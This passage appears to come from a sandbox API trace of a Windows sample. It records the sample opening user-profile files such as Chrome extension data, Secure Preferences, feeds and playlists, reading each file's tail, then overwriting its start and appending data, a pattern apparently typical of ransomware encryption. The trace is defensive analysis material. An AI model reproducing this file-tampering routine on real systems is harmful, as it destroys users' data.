lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.911] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.157] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2fdc [0165.157] ReadFile (in: hFile=0x1d8, lpBuffer=0x25ac1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.158] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2fdc [0165.158] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.159] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.159] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.159] CloseHandle (hObject=0x1d8) returned 1 [0165.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.573] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.573] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x563d [0165.573] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.573] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.573] ReleaseMutex (hMutex=0x168) returned 1 [0165.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.574] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.575] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x463d [0165.575] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.577] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x463d [0165.577] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.577] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.578] WriteFile (in: hFile=0x210, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.578] CloseHandle (hObject=0x210) returned 1 [0165.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.580] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.580] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7299 [0165.580] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.580] ReleaseMutex (hMutex=0x168) returned 1 [0165.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="computed_hashes.json", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="computed_hashes.json", lpUsedDefaultChar=0x0) returned 20 [0165.581] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.597] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6299 [0165.598] ReadFile (in: hFile=0x210, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.607] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6299 [0165.608] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.608] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.608] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.608] CloseHandle (hObject=0x210) returned 1 [0165.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.611] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.611] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3000 [0165.611] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.611] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.611] ReleaseMutex (hMutex=0x168) returned 1 [0165.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0165.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", cchWideChar=64, lpMultiByteStr=0x1fac91c, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpUsedDefaultChar=0x0) returned 64 [0165.611] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.614] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2000 [0165.614] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.615] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2000 [0165.615] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.615] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.616] WriteFile (in: hFile=0x210, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.616] CloseHandle (hObject=0x210) returned 1 [0165.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.617] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.617] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8b43 [0165.617] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.618] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.618] ReleaseMutex (hMutex=0x168) returned 1 [0165.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Secure Preferences", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0165.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Secure Preferences", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Secure Preferences", lpUsedDefaultChar=0x0) returned 18 [0165.618] ReadFile (in: hFile=0x210, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0165.620] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7b43 [0165.621] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.621] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7b43 [0165.622] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.623] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.623] WriteFile (in: hFile=0x210, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0165.624] CloseHandle (hObject=0x210) returned 1 [0165.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.625] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.625] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x10 [0165.625] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.625] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.626] ReleaseMutex (hMutex=0x168) returned 1 [0165.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Docs.ico.md5", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Docs.ico.md5", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Google Docs.ico.md5", lpUsedDefaultChar=0x0) returned 19 [0165.626] ReadFile (in: hFile=0x210, lpBuffer=0x1f732c8, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f732c8*, lpNumberOfBytesRead=0x359f2bc*=0x10, lpOverlapped=0x0) returned 1 [0165.627] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0165.627] WriteFile (in: hFile=0x210, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x598, lpOverlapped=0x0) returned 1 [0165.628] CloseHandle (hObject=0x210) returned 1 [0165.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.629] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.629] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7000 [0165.629] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.629] ReleaseMutex (hMutex=0x168) returned 1 [0165.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News~.feed-ms", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News~.feed-ms", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News~.feed-ms", lpUsedDefaultChar=0x0) returned 19 [0165.629] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.632] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0165.632] ReadFile (in: hFile=0x210, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.633] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6000 [0165.633] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.634] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0165.634] WriteFile (in: hFile=0x210, lpBuffer=0x2877d18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877d18*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.634] CloseHandle (hObject=0x210) returned 1 [0165.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0165.635] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.635] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x43 [0165.635] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0165.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.636] ReleaseMutex (hMutex=0x168) returned 1 [0165.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0165.636] ReadFile (in: hFile=0x210, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x359f2bc*=0x43, lpOverlapped=0x0) returned 1 [0165.637] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0165.637] WriteFile (in: hFile=0x210, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0165.638] CloseHandle (hObject=0x210) returned 1 [0165.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.023] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.053] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x31d [0166.054] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.054] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.058] ReleaseMutex (hMutex=0x168) returned 1 [0166.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0166.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="05_Pictures_taken_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 39 [0166.059] 